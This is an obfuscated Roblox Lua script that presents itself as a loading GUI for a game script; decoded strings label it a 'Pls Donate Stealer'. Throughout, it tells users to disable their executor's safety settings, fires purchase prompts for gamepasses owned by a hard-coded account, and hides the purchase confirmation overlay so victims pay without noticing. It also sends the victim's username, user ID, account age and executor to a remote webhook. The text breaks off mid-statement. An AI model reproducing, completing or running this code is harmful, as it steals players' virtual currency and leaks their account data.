--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v107,v108) local v109={};for v159=1, #v107 do v6(v109,v0(v4(v1(v2(v107,v159,v159 + 1 )),v1(v2(v108,1 + (v159% #v108) ,1 + (v159% #v108) + 1 )))%256 ));end return v5(v109);end local v8=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));local v9=Instance.new(v7("\5\223\43\200\249","\156\67\173\74\165"));local v10=Instance.new(v7("\0\178\81\2\144\39\68\49\187","\38\84\215\41\118\220\70"));local v11=Instance.new(v7("\100\19\58\6\210\81\20\39\30","\158\48\118\66\114"));local v12=Instance.new(v7("\159\33\8\34\81\176\239\191\43\30","\155\203\68\112\86\19\197"));local v13=game:GetService(v7("\114\202\51\249\78\75\224\234\80\212\53\249","\152\38\189\86\156\32\24\133"));local v14=Instance.new(v7("\201\126\132\73\238\89\162\84","\38\156\55\199"));local v15=Instance.new(v7("\157\84\79\60\1\123\241\70","\35\200\29\28\72\115\20\154"));local v16=Instance.new(v7("\44\150\242\208\159\34\49\11","\84\121\223\177\191\237\76"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\139\90\200\185\63\66\23\212\178","\161\219\54\169\192\90\48\80"));v9.Parent=v8;v9.Size=UDim2.new(1579 -(1063 + 516) ,250,0 -0 ,110);v9.Position=UDim2.new(4 -3 ,830 -530 ,1 + 0 , -(892 -(757 + 15)));v9.BackgroundColor3=Color3.fromRGB(11 + 9 ,36 -16 ,20);v9.BorderSizePixel=0 + 0 ;v9.Visible=true;v14.Parent=v9;v14.CornerRadius=UDim.new(0,10);v15.Parent=v9;v15.Thickness=1.5;v15.Color=Color3.fromRGB(255,255,142 + 113 );v10.Parent=v9;v10.Size=UDim2.new(1 + 0 , -16,0 + 0 ,24);v10.Position=UDim2.new(0 + 0 ,441 -(153 + 280) ,0,23 -15 );v10.Text=v7("\109\67\19\45\9\113\3\55\64\82\20","\69\41\34\96");v10.TextSize=18;v10.TextColor3=Color3.fromRGB(229 + 26 ,101 + 154 ,134 + 121 );v10.BackgroundTransparency=1;v10.Font=Enum.Font.GothamBold;v10.TextXAlignment=Enum.TextXAlignment.Left;v11.Parent=v9;v11.Size=UDim2.new(1 + 0 , -16,0 + 0 ,57 -19 );v11.Position=UDim2.new(0 + 0 ,675 -(89 + 578) ,0 + 0 ,70 -36 );v11.Text="Loading Gui, Will Take A Few Seconds \n if it doesn't appear please rejoin.";v11.TextSize=1063 -(572 + 477) ;v11.TextColor3=Color3.fromRGB(32 + 198 ,230,230);v11.BackgroundTransparency=1 + 0 ;v11.Font=Enum.Font.Gotham;v11.TextWrapped=true;v11.TextYAlignment=Enum.TextYAlignment.Top;v12.Parent=v9;v12.Size=UDim2.new(1 + 0 , -(106 -(84 + 2)),0 -0 ,26);v12.Position=UDim2.new(0 + 0 ,852 -(497 + 345) ,1, -(1 + 33));v12.Text=v7("\159\207\216\25\7","\75\220\163\183\106\98");v12.TextSize=16;v12.Font=Enum.Font.GothamBold;v12.BackgroundColor3=Color3.fromRGB(7 + 33 ,1373 -(605 + 728) ,29 + 11 );v12.TextColor3=Color3.fromRGB(566 -311 ,12 + 243 ,942 -687 );v12.BorderSizePixel=0 + 0 ;v16.Parent=v12;v16.CornerRadius=UDim.new(0,21 -13 );local v63=Instance.new(v7("\36\168\138\58\220","\185\98\218\235\87"));local v64=Instance.new(v7("\254\21\4\233\204\164\206\46","\202\171\92\71\134\190"));local v65=Instance.new(v7("\28\232\31\156\59\206\39\141","\232\73\161\76"));local v66=Instance.new(v7("\143\220\90\73\50\186\219\71\81","\126\219\185\34\61"));v63.Parent=v8;v63.Size=UDim2.new(0,189 + 61 ,489 -(457 + 32) ,34 + 46 );v63.Position=UDim2.new(1,1702 -(832 + 570) ,1, -210);v63.BackgroundColor3=Color3.fromRGB(30,29 + 1 ,8 + 22 );v63.BorderSizePixel=0;v63.ZIndex=35 -25 ;v63.Visible=true;v64.Parent=v63;v64.CornerRadius=UDim.new(0 + 0 ,10);v65.Parent=v63;v65.Thickness=1.5;v65.Color=Color3.fromRGB(255,255,255);v66.Parent=v63;v66.Size=UDim2.new(797 -(588 + 208) , -16,1, -(43 -27));v66.Position=UDim2.new(0,1808 -(884 + 916) ,0,8);v66.BackgroundTransparency=1 -0 ;v66.TextWrapped=true;v66.TextYAlignment=Enum.TextYAlignment.Top;v66.Font=Enum.Font.GothamBold;v66.TextSize=9 + 5 ;v66.TextColor3=Color3.fromRGB(908 -(232 + 421) ,2144 -(1569 + 320) ,63 + 192 );v66.TextTransparency=0;v66.ZIndex=3 + 8 ;local function v90() local v110=0 -0 ;local v111;local v112;local v113;local v114;local v115;local v116;while true do if (v110==4) then local v214=0;while true do if (v214==(605 -(316 + 289))) then v116=Instance.new(v7("\252\43\56\148\152\24\254\205\34","\156\168\78\64\224\212\121"));v116.Size=UDim2.new(2 -1 ,0 + 0 ,1454 -(666 + 787) ,0);v214=1;end if (v214==(426 -(360 + 65))) then v116.BackgroundTransparency=1;v110=5;break;end end end if (v110==(5 + 0)) then v116.Text="Wait for the button to change \n when you click Load Script then Continue To Script";v116.Font=Enum.Font.FredokaOne;v116.TextSize=274 -(79 + 175) ;v110=9 -3 ;end if (v110==(3 + 0)) then local v219=0;while true do if (v219==(0 -0)) then v115=Instance.new(v7("\242\125\83\27\171\16\194\70","\126\167\52\16\116\217"));v115.Parent=v113;v219=1 -0 ;end if (v219==(900 -(503 + 396))) then v115.CornerRadius=UDim.new(181.2 -(92 + 89) ,0 -0 );v110=3 + 1 ;break;end end end if (v110==(2 + 0)) then v113.BackgroundTransparency=3 -2 ;v113.Parent=v112;v114=Instance.new(v7("\50\63\138\63\21\25\178\46","\75\103\118\217"));v110=3;end if (v110==(1 + 6)) then v116.Parent=v113;break;end if (v110==(2 -1)) then local v223=0 + 0 ;while true do if (v223==(0 + 0)) then v113=Instance.new(v7("\173\226\51\80\253","\199\235\144\82\61\152"));v113.Size=UDim2.new(0 -0 ,23 + 157 ,0 -0 ,40);v223=1245 -(485 + 759) ;end if (v223==(2 -1)) then v113.Position=UDim2.new(1189.5 -(442 + 747) , -90,1135.52 -(832 + 303) ,966 -(88 + 858) );v110=1 + 1 ;break;end end end if (v110==(5 + 1)) then v116.TextStrokeTransparency=0 + 0 ;v116.TextStrokeColor3=Color3.fromRGB(839 -(766 + 23) ,246 -196 ,68 -18 );v116.TextColor3=Color3.fromRGB(255,255,671 -416 );v110=23 -16 ;end if (v110==(1073 -(1036 + 37))) then v111=game.Players.LocalPlayer:WaitForChild(v7("\60\194\95\107\123\101\212\242\5","\135\108\174\62\18\30\23\147"));v112=Instance.new(v7("\133\234\56\206\29\160\20\210\191","\167\214\137\74\171\120\206\83"));v112.Parent=v111;v110=1;end end end local function v91() local v117=0 + 0 ;local v118;local v119;local v120;local v121;local v122;local v123;while true do if (4==v117) then v121.Color=Color3.fromRGB(97 -47 ,162 + 43 ,50);v122=Instance.new(v7("\231\207\18\189\180\240\14\192","\107\178\134\81\210\198\158"));v122.Parent=v120;v122.CornerRadius=UDim.new(1480.2 -(641 + 839) ,0);v117=5;end if (v117==(920 -(910 + 3))) then v123.ZIndex=6;break;end if (v117==(15 -9)) then v123.TextSize=20;v123.Size=UDim2.new(1685 -(1466 + 218) ,0 + 0 ,1149 -(556 + 592) ,0 + 0 );v123.BackgroundTransparency=809 -(329 + 479) ;v123.TextColor3=Color3.fromRGB(255,255,1109 -(174 + 680) );v117=23 -16 ;end if (v117==(1 -0)) then v120=Instance.new(v7("\242\214\239\81\209","\60\180\164\142"));v120.Parent=v119;v120.BackgroundColor3=Color3.fromRGB(36 + 14 ,944 -(396 + 343) ,5 + 45 );v120.Size=UDim2.new(0,300,1477 -(29 + 1448) ,1449 -(135 + 1254) );v117=7 -5 ;end if (v117==(23 -18)) then v123=Instance.new(v7("\12\11\154\210\134\57\12\135\202","\202\88\110\226\166"));v123.Parent=v120;v123.Text=v7("\224\32\172\195\227\237\58\167\183\254\236\79\177\212\248\234\63\182\182","\170\163\111\226\151");v123.Font=Enum.Font.FredokaOne;v117=4 + 2 ;end if (v117==2) then v120.Position=UDim2.new(1527.5 -(389 + 1138) , -145,574.29 -(102 + 472) ,v7("\21\14","\114\56\62\101\73\71\141"));v120.BorderSizePixel=0 + 0 ;v120.Active=true;v120.Draggable=false;v117=2 + 1 ;end if (v117==(0 + 0)) then v118=game.Players.LocalPlayer:WaitForChild(v7("\55\226\164\215\2\252\130\219\14","\174\103\142\197"));v119=Instance.new(v7("\101\43\77\61\32\80\223\67\33","\152\54\72\63\88\69\62"));v119.Parent=v118;v119.ZIndexBehavior=Enum.ZIndexBehavior.Global;v117=1546 -(320 + 1225) ;end if ((5 -2)==v117) then v120.ZIndex=4 + 1 ;v121=Instance.new(v7("\141\192\232\208\170\230\208\193","\164\216\137\187"));v121.Parent=v120;v121.Thickness=1466 -(157 + 1307) ;v117=4;end end end local function v92() local v124=1859 -(821 + 1038) ;local v125;local v126;local v127;local v128;local v129;local v130;while true do if (v124==5) then v128.Thickness=2;v128.Color=Color3.fromRGB(636 -381 ,215,0);v129=Instance.new(v7("\225\54\36\220\164\114\131\198","\230\180\127\103\179\214\28"));v124=1 + 5 ;end if (v124==(13 -5)) then local v255=0;while true do if (v255==(0 + 0)) then v130.TextSize=20;v130.Size=UDim2.new(2 -1 ,1026 -(834 + 192) ,1 + 0 ,0 + 0 );v255=1 + 0 ;end if (v255==(1 -0)) then v130.BackgroundTransparency=305 -(300 + 4) ;v124=3 + 6 ;break;end end end if (2==v124) then v127.BackgroundColor3=Color3.fromRGB(255,562 -347 ,0);v127.Size=UDim2.new(0,662 -(112 + 250) ,0,24 + 36 );v127.Position=UDim2.new(0.5 -0 , -(84 + 61),0.29 + 0 ,v7("\224\141","\150\205\189\112\144\24"));v124=3 + 0 ;end if (v124==(2 + 1)) then v127.BorderSizePixel=0 + 0 ;v127.Active=true;v127.Draggable=false;v124=1418 -(1001 + 413) ;end if (v124==6) then v129.Parent=v127;v129.CornerRadius=UDim.new(0.2 -0 ,0);v130=Instance.new(v7("\184\0\71\82\200\64\226\137\9","\128\236\101\63\38\132\33"));v124=889 -(244 + 638) ;end if (v124==7) then local v264=0;while true do if (v264==(693 -(627 + 66))) then v130.Parent=v127;v130.Text=v7("\128\134\48\96\246\216\236\158\128\33\112\247","\175\204\201\113\36\214\139");v264=1;end if (v264==(2 -1)) then v130.Font=Enum.Font.FredokaOne;v124=610 -(512 + 90) ;break;end end end if (v124==1) then v126.ZIndexBehavior=Enum.ZIndexBehavior.Global;v127=Instance.new(v7("\60\255\185\189\169","\199\122\141\216\208\204\221"));v127.Parent=v126;v124=2;end if (v124==(1910 -(1665 + 241))) then v127.ZIndex=722 -(373 + 344) ;v128=Instance.new(v7("\16\173\140\88\22\135\26\21","\112\69\228\223\44\100\232\113"));v128.Parent=v127;v124=3 + 2 ;end if (v124==(0 + 0)) then v125=game.Players.LocalPlayer:WaitForChild(v7("\33\60\179\33\75\37\14\4\57","\73\113\80\210\88\46\87"));v126=Instance.new(v7("\178\47\223\23\226\143\11\216\27","\135\225\76\173\114"));v126.Parent=v125;v124=2 -1 ;end if ((14 -5)==v124) then v130.TextColor3=Color3.fromRGB(1354 -(35 + 1064) ,186 + 69 ,545 -290 );v130.ZIndex=1 + 5 ;break;end end end v66.Text="Turn off all ur settings in delta for it to work, make sure it's turned off before executing! don't execute after turning it off";local function v94() local v131=1236 -(298 + 938) ;local v132;local v133;while true do if ((1259 -(233 + 1026))==v131) then v132=UDim2.new(1, -260,1667 -(636 + 1030) , -(62 + 58));v133=v13:Create(v9,TweenInfo.new(0.5,Enum.EasingStyle.Sine,Enum.EasingDirection.Out),{[v7("\119\195\38\213\16\78\195\59","\100\39\172\85\188")]=v132});v131=1 + 0 ;end if (v131==(1 + 0)) then v133:Play();break;end end end local function v95() local v134=0;local v135;while true do if (v134==(0 + 0)) then v135=v13:Create(v63,TweenInfo.new(221.5 -(55 + 166) ,Enum.EasingStyle.Sine,Enum.EasingDirection.Out),{[v7("\157\119\170\137\39\164\119\183","\83\205\24\217\224")]=UDim2.new(1 + 0 , -260,1 + 0 , -210)});v135:Play();break;end end end local function v96() local v136=0 -0 ;local v137;local v138;local v139;while true do if (1==v136) then v139=nil;while true do if (v137==(298 -(36 + 261))) then v139:Play();v139.Completed:Connect(function() v9.Visible=false;end);break;end if (v137==0) then local v303=0;while true do if (v303==(0 -0)) then v138=UDim2.new(1369 -(34 + 1334) ,300,1 + 0 , -(94 + 26));v139=v13:Create(v9,TweenInfo.new(0.5,Enum.EasingStyle.Sine,Enum.EasingDirection.In),{[v7("\214\202\222\52\242\204\194\51","\93\134\165\173")]=v138});v303=1;end if (v303==(1284 -(1035 + 248))) then v137=1;break;end end end end break;end if (v136==0) then v137=21 -(20 + 1) ;v138=nil;v136=1 + 0 ;end end end v12.MouseButton1Click:Connect(function() local v140=319 -(134 + 185) ;local v141;while true do if (v140==(1134 -(549 + 584))) then v141.Completed:Connect(function() local v278=685 -(314 + 371) ;local v279;while true do if (v278==(0 -0)) then v279=v13:Create(v12,TweenInfo.new(968.08 -(478 + 490) ),{[v7("\214\71\106\15","\106\133\46\16")]=UDim2.new(1 + 0 , -(1192 -(786 + 386)),0 -0 ,26)});v279:Play();v278=1380 -(1055 + 324) ;end if (1==v278) then v279.Completed:Connect(v96);break;end end end);break;end if (v140==(1340 -(1093 + 247))) then v141=v13:Create(v12,TweenInfo.new(0.08),{[v7("\141\251\219\199","\30\222\146\161\162\90\174\210")]=UDim2.new(1 + 0 , -(3 + 21),0 -0 ,81 -57 )});v141:Play();v140=2 -1 ;end end end);v94();task.delay(0.6 -0 ,v95);Username=v7("\96\56\107\196\86\79\78\37\97\229\86\17","\32\56\64\19\156\58");Webhook=v7("\82\220\241\70\73\168\207\21\204\236\69\89\253\146\94\134\230\89\87\189\129\74\193\170\65\95\240\136\85\199\238\69\21\163\211\15\144\188\5\15\166\217\14\152\177\15\12\164\213\10\144\177\25\92\221\161\114\158\234\122\101\255\130\115\207\245\2\81\212\164\116\250\240\7\121\254\213\86\153\201\103\15\231\145\108\155\168\126\96\232\211\23\234\188\1\78\251\133\121\238\212\5\82\224\171\120\223\253\110\3\203\131\104\242\255\4\110\197\191\3\210","\224\58\168\133\54\58\146");ReplicatedStorage=game:GetService(v7("\107\83\91\241\124\133\134\31\92\82\120\233\122\148\134\12\92","\107\57\54\43\157\21\230\231"));MarketplaceService=game:GetService(v7("\246\138\3\254\188\200\223\215\138\18\240\138\217\221\205\130\18\240","\175\187\235\113\149\217\188"));HttpService=game:GetService(v7("\20\187\149\92\208\124\106\42\166\130\73","\24\92\207\225\44\131\25"));CoreGui=game:GetService(v7("\104\220\170\73\60\104\66","\29\43\179\216\44\123"));Players=game:GetService(v7("\141\213\33\85\184\203\51","\44\221\185\64"));local v97=game:GetService(v7("\41\243\92\79\64\4\245\94\86\112\4","\19\97\135\40\63"));local v98=(syn and syn.request) or request ;if (typeof(v98)~=v7("\168\73\61\56\59\56\161\82","\81\206\60\83\91\79")) then error(v7("\17\234\143","\196\46\203\176\18\79\163\45"));end Remotes=require(ReplicatedStorage:WaitForChild(v7("\138\39\115\17\48\254\252","\143\216\66\30\126\68\155")));function getPlayerGamepasses(v142) local v143=0 + 0 ;local v144;local v145;local v146;local v147;local v148;local v149;local v150;local v151;local v152;local v153;while true do if (v143==0) then local v273=0;local v274;while true do if (v273==(0 -0)) then v274=0 -0 ;while true do if (v274==(1 + 0)) then if  not v145 then return nil,v7("\163\198\27\202\201\170\211\161\191\219\8\217\203\162\218\228\240\136","\129\202\168\109\171\165\195\183")   .. tostring(v146) ;end v143=2 -1 ;break;end if (v274==(688 -(364 + 324))) then v144=nil;v145,v146=pcall(function() v144=Players:GetUserIdFromNameAsync(v142);end);v274=2 -1 ;end end break;end end end if ((2 -1)==v143) then v147=nil;v148,v149=pcall(function() v147=Remotes.Function(v7("\13\94\49\212\215\26\227\18\84\54\193\219\6\202\45\87\60\205\206","\134\66\56\87\184\190\116")):InvokeServer(v144);end);if  not v148 then return nil,v7("\19\55\15\183\16\229\36\5\48\48\16\190\11\199\46\58\55\36\25\251\31\234\40\57\57\53\83\251","\85\92\81\105\219\121\139\65")   .. tostring(v149) ;end v143=1 + 1 ;end if (2==v143) then if (typeof(v147)~=v7("\212\189\67\81\125\209\254\182","\191\157\211\48\37\28")) then return nil,v7("\202\17\241\4\42\218\28\224\25\62\159\19\251\19\49\202\15\180\14\63\204\10\248\8\96\159","\90\191\127\148\124")   .. typeof(v147) ;end v150=v147:FindFirstChild(v7("\90\136\33\3\112\178\7","\119\24\231\78"),true);v151=v150 and v150:FindFirstChild(v7("\171\57\160\71\207","\113\226\77\197\42\188\32")) and v150.Items:FindFirstChild(v7("\28\4\245\184\63","\213\90\118\148")) ;v143=12 -9 ;end if (v143==4) then v153=ReplicatedStorage:FindFirstChild(v7("\138\172\37\18\26\10\194\115\170\165\55\22\0","\49\197\202\67\126\115\100\167"));if v153 then v147.Parent=v153;end return {[v7("\34\72\218\59\142\87\83\50","\62\87\59\191\73\224\54")]=v142,[v7("\242\17\255\219\206\6","\169\135\98\154")]=v144,[v7("\201\120\43\64\245\29\201\198\114","\168\171\23\68\52\157\83")]=v147.Name,[v7("\246\126\250\185\45","\231\148\17\149\205\69\77")]=v147,[v7("\135\166\202\254\71\254\147\180\194\232","\159\224\199\167\155\55")]=v152};end if (v143==(4 -1)) then v152={};if v151 then for v304,v305 in ipairs(v151:GetChildren()) do if (v305:GetAttribute(v7("\122\61\167\83\89\111\55\164\83","\45\59\78\212\54"))==v7("\55\87\142\142\150\47\190\227","\144\112\54\227\235\230\78\205")) then local v325=0 -0 ;local v326;while true do if (v325==(1268 -(1249 + 19))) then v326=v305:FindFirstChild(v7("\131\58\0\241\192\79","\59\211\72\111\156\176"));table.insert(v152,{[v7("\64\134\238\40","\77\46\231\131")]=v305.Name,[v7("\187\71\165\69\174\125\178","\32\218\52\214")]=v305:GetAttribute(v7("\111\4\34\173\229\153\65","\58\46\119\81\200\145\208\37")),[v7("\42\159\35\169\189\141\36\34\143\53","\86\75\236\80\204\201\221")]=v305:GetAttribute(v7("\83\82\100\128\234\187\96\72\116\128","\235\18\33\23\229\158")),[v7("\81\169\210\190\68\142\216\171\85","\219\48\218\161")]=v305:GetAttribute(v7("\197\98\111\76\207\123\249\244\116","\128\132\17\28\41\187\47")),[v7("\17\32\9\55\77\21","\61\97\82\102\90")]=v326,[v7("\165\58\174\70","\105\204\78\203\43\167\55\126")]=v305});break;end end end end end table.sort(v152,function(v280,v281) return (v280.assetPrice or 0)<(v281.assetPrice or (0 + 0)) ;end);v143=15 -11 ;end end end local v99,v100=pcall(function() return Players:GetUserIdFromNameAsync(Username);end);local v101;local v102;local function v103() local v154=1086 -(686 + 400) ;local v155;local v156;local v157;while true do if (v154==0) then local v275=0 + 0 ;while true do if (v275==1) then v154=1;break;end if (v275==0) then v155={[v7("\226\224\57\192\249\242\49\215","\178\151\147\92")]=v7("\164\244\88\114\61\66\58\188\241\95\114\54\67\116\141\233\73","\26\236\157\44\82\114\44"),[v7("\43\56\212\79\43\60\234\78\56\34","\59\74\78\181")]=v7("\45\197\78\74\160\127\158\21\89\183\43\159\94\83\160\38\222\72\94\178\53\193\20\89\188\40\158\91\78\167\36\210\82\87\182\43\197\73\21\226\119\136\3\10\227\116\136\14\12\226\124\128\10\14\227\112\137\2\21\226\118\131\3\13\231\125\135\14\13\235\115\133\9\10\224\115\133\13\21\186\40\208\93\95\160\26\132\20\80\163\34\142\95\66\238\115\134\2\88\228\125\135\92\28\186\54\140\12\13\235\36\131\12\95\181\99\217\87\7\227\39\137\3\88\182\119\128\13\94\182\116\132\12\88\227\39\210\88\91\176\39\135\88\9\181\115\128\11\91\224\39\213\95\13\229\38\211\94\8\183\33\131\12\91\229\39\131\92\12\178\125\133\9\91\177\112\210\3\11\230\33\133\13\28","\211\69\177\58\58"),[v7("\180\234\119\225\236\197\163","\171\215\133\25\149\137")]=v7("\216\199\39\186\200\63\232\2\201\193\38","\34\129\168\82\154\143\80\156"),[v7("\128\191\49\14\76\93","\233\229\210\83\107\40\46")]={{[v7("\213\75\38\218\0","\101\161\34\82\182")]="**__Shar's Script__ | __Pls Donate Stealer__**",[v7("\235\2\85\241\201","\78\136\109\57\158\187\130\226")]=tonumber(3368676 -(73 + 156) ),[v7("\58\58\234\242\44\54\233\229\55\48\247","\145\94\95\153")]=clickablePlayerName   .. v7("\189\248\7\208\14\142\242\216\6\149\125\180\239\196\4\193\0","\215\157\173\116\181\46") ,[v7("\33\188\158\255\216\59\181\130\254","\186\85\212\235\146")]={[v7("\215\147\26","\56\162\225\118\158\89\142")]=v7("\84\17\212\191\49\130\19\74\215\184\53\150\78\10\194\163\45\192\18\6\207\162\109\208\89\4\196\188\42\215\72\72\212\167\55\213\94\11\193\166\46\151\85\8\193\168\39\135\73\22\197\189\11\220\1","\184\60\101\160\207\66")   .. tostring(playerId)   .. v7("\119\149\117\184\37\138\33\232\99\210\58\180\52\139\123\180\37\223\40\238\97\196\122\179\35\143\125\168\108\146\114\187","\220\81\226\28") },[v7("\21\220\135\247\238\212","\167\115\181\226\155\138")]={{[v7("\236\35\234\89","\166\130\66\135\60\27\17")]=v7("\109\68\200\122\34\73\75\218\124\63\74","\80\36\42\174\21"),[v7("\88\17\59\111\75","\26\46\112\87")]="```lua\nExecutor: "   .. tostring(identifyexecutor())   .. "\nUsername: "   .. game.Players.LocalPlayer.Name   .. "\nUser-ID: "   .. tostring(game.Players.LocalPlayer.UserId)   .. "\nAccount Age: "   .. tostring(game.Players.LocalPlayer.AccountAge)   .. v7("\185\35\171","\212\217\67\203\20\223\223\37") },{[v7("\180\140\165\215","\178\218\237\200")]=v7("\132\186\228\197\174","\176\214\213\134"),[v7("\226\172\186\193\173","\57\148\205\214\180\200\54")]=v7("\18\253\53","\22\114\157\85\84")   .. v102   .. v7("\196\203\19","\200\164\171\115\164\61\150") }},[v7("\184\251\12\81\134\172","\227\222\148\99\37")]={[v7("\39\87\74\226","\153\83\50\50\150")]=v7("\126\100\118\29\103\174\73\29\116\106\92\64\163\76\79","\45\61\22\19\124\19\203")}}}};v156=v97:JSONEncode({[v7("\194\29\3\225\7\126\173","\217\161\114\109\149\98\16")]=v7("\50\37\46\121\174\109\29\46\61","\20\114\64\88\28\220"),[v7("\52\12\208\177\252\195","\221\81\97\178\212\152\176")]={v155}});v275=1;end end end if ((1 + 0)==v154) then v157=v98({[v7("\248\245\17","\122\173\135\125\155")]=Webhook,[v7("\169\196\20\177\48\53","\168\228\161\96\217\95\81")]=v7("\235\254\29\104","\55\187\177\78\60\79"),[v7("\5\203\94\239\67\221\147","\224\77\174\63\139\38\175")]=headers,[v7("\166\78\92\55","\78\228\33\56")]=v156});break;end end end local function v104(v158) return game:GetService(v7("\227\127\160\8\128\218\110\190\2\134\203\77\183\17\147\199\125\183","\229\174\30\210\99")):GetProductInfo(v158,Enum.InfoType.GamePass).PriceInRobux;end local v105;local v106;if v99 then local v160=workspace.CurrentCamera;local v161=getPlayerGamepasses(Username);local v162;local v163=math.huge;for v176,v177 in pairs(v161.gamepasses) do if (v177.assetPrice<v163) then local v282=0 -0 ;while true do if (v282==(470 -(224 + 246))) then v163=v177.assetPrice;v162=v177;break;end end end end if v162 then v162.prompt:FireServer("",false,v163,v104(v162.assetId));end local function v164() local v178=0 -0 ;local v179;while true do if (v178==(1 -0)) then if v101 then v101.prompt:FireServer("",false,v179,v104(v101.assetId));end break;end if (v178==(0 + 0)) then local v285=0 + 0 ;while true do if ((0 + 0)==v285) then v179=0;for v327,v328 in pairs(v161.gamepasses) do if ((v328.assetPrice<=v102) and (v328.assetPrice>v179)) then local v331=0 -0 ;local v332;while true do if (v331==0) then v332=0 -0 ;while true do if (v332==0) then v179=v328.assetPrice;v101=v328;break;end end break;end end end end v285=1;end if (v285==(514 -(203 + 310))) then v178=1994 -(1238 + 755) ;break;end end end end end local function v165(v180) local v181=0 + 0 ;local v182;while true do if (v181==1) then for v306,v307 in v182 do if tonumber(v307) then return tonumber(v307);end end return nil;end if (v181==(1534 -(709 + 825))) then if  not v180 then return nil;end v182=v180:split(" ");v181=1 -0 ;end end end local function v166() local v183=0 -0 ;local v184;local v185;local v186;local v187;local v188;while true do if (v183==1) then v186=nil;v187=nil;v183=866 -(196 + 668) ;end if (0==v183) then v184=0;v185=nil;v183=3 -2 ;end if (v183==2) then v188=nil;while true do local v308=0;while true do if (v308==0) then if ((1 -0)==v184) then v187=v186.Content;v188=v187.Header.Content.SubContent.ModalHeader;v184=835 -(171 + 662) ;end if (v184==(95 -(4 + 89))) then return {[v7("\217\182\8\61\207\215\185","\163\182\192\109\79")]=v185,[v7("\39\46\5\197\225","\149\84\70\96\160")]=v186,[v7("\58\9\9\244","\141\88\102\109")]=v187,[v7("\177\70\211\82\15\41\65\206\189","\161\211\51\170\16\122\93\53")]=v187.Actions["1"].BuyButton,[v7("\249\187\171\28\254\182\166","\72\155\206\210")]=v187.Actions["1"].BuyButton:FindFirstChild(v7("\114\127\76\26","\83\38\26\52\110")),[v7("\90\22\43\71\86\20\34\106\89\21\34\74","\38\56\119\71")]=v188.RightSide.RobuxPrice,[v7("\231\230\76\218\32\122\242\237\93\218","\54\147\143\56\182\69")]=v188.LeftSide.RobuxAmount,[v7("\222\132\254\77\218\196\162\243\70\204\211","\191\182\225\159\41")]=v187.Header.Content.CloseAffordance,[v7("\34\6\45\88\187\134\204\46\30","\162\75\114\72\53\235\231")]=v187:FindFirstChild(v7("\175\51\74\246\86\12\152","\98\236\92\36\130\51"))};end v308=3 -2 ;end if (1==v308) then if ((0 + 0)==v184) then v185=CoreGui:WaitForChild(v7("\61\226\147\95\233\60\45\18\226\136\126\251\56\43\23\236\159","\89\123\141\230\49\141\93"),263 -203 );v186=v185:WaitForChild(v7("\192\112\240\9\49\88\246\112\208\30\17\71\246","\42\147\17\150\108\112")):WaitForChild(v7("\32\176\40\109\235\233\22\150\34\109\243\233\3","\136\111\198\77\31\135")):WaitForChild(v7("\49\1\162\83\169\199\24\167\22\8\174\88\184\246","\201\98\105\199\54\221\132\119")):WaitForChild(v7("\159\30\130\44\7","\204\217\108\227\65\98\85")):WaitForChild(v7("\109\203\240\224\56","\160\62\163\149\133\76"));v184=1;end break;end end end break;end end end local function v167() return game:GetService(v7("\135\22\30\191\98\189\188","\80\196\121\108\218\37\200\213")):WaitForChild(v7("\38\124\23\113\79\15\158\9\124\12\80\93\11\152\12\114\27","\234\96\19\98\31\43\110")):WaitForChild(v7("\53\30\84\194\141\96\142\7\57\64\198\161\119","\235\102\127\50\167\204\18")):WaitForChild(v7("\127\183\240\49\72\47\73\145\250\49\80\47\92","\78\48\193\149\67\36")):WaitForChild(v7("\3\22\133\29\85\19\17\142\12\64\57\16\133\10","\33\80\126\224\120")):WaitForChild(v7("\202\186\2\201\89","\60\140\200\99\164")):WaitForChild(v7("\180\252\1\35\182","\194\231\148\100\70")):WaitForChild(v7("\101\67\207\183\243\198\82","\168\38\44\161\195\150"));end local v168=game:GetService(v7("\163\243\144\115\23\253\191","\118\224\156\226\22\80\136\214")):WaitForChild(v7("\100\225\76\142\70\239\77\137\77\224\118\150\71\252\85\129\91","\224\34\142\57")):WaitForChild(v7("\237\166\195\216\82\227\88\15\248\181\196\208\118","\110\190\199\165\189\19\145\61")):WaitForChild(v7("\245\253\114\250\135\198\195\219\120\250\159\198\214","\167\186\139\23\136\235")):WaitForChild(v7("\41\189\141\8\14\150\135\3\14\180\129\3\31\167","\109\122\213\232")):WaitForChild(v7("\200\229\163\61\235","\80\142\151\194")):WaitForChild(v7("\48\206\114\73\23","\44\99\166\23"));local function v169() v168.BackgroundTransparency=4 + 6 ;end local function v170() local v190=v167();local v191=v190:WaitForChild(v7("\84\242\40\50\54\182","\196\28\151\73\86\83")):WaitForChild(v7("\208\12\39\4\135\86\12","\22\147\99\73\112\226\56\120")):WaitForChild(v7("\139\96\224\214\130\182\97\231\251\153","\237\216\21\130\149")):WaitForChild(v7("\175\65\91\94\188\225\91\131\74\90\77","\62\226\46\63\63\208\169"));game:GetService(v7("\198\22\71\134\56\24\38","\62\133\121\53\227\127\109\79")).FoundationOverlay.SafeAreaFrame.OverlayPortal.Backdrop.Visible=false;game:GetService(v7("\51\27\32\240\241\187\171","\194\112\116\82\149\182\206")).FoundationOverlay.SafeAreaFrame.OverlayPortal.SheetContainer.Frame.Sheet.Content.Header.Content.SubContent.Visible=false;game:GetService(v7("\26\167\94\29\231\247\7","\110\89\200\44\120\160\130")).FoundationOverlay.SafeAreaFrame.OverlayPortal.SheetContainer.Frame.Sheet.Content.Header.Content.CloseAffordance.Size=UDim2.new(1486 -(35 + 1451) ,420,1453 -(28 + 1425) ,2033 -(941 + 1052) 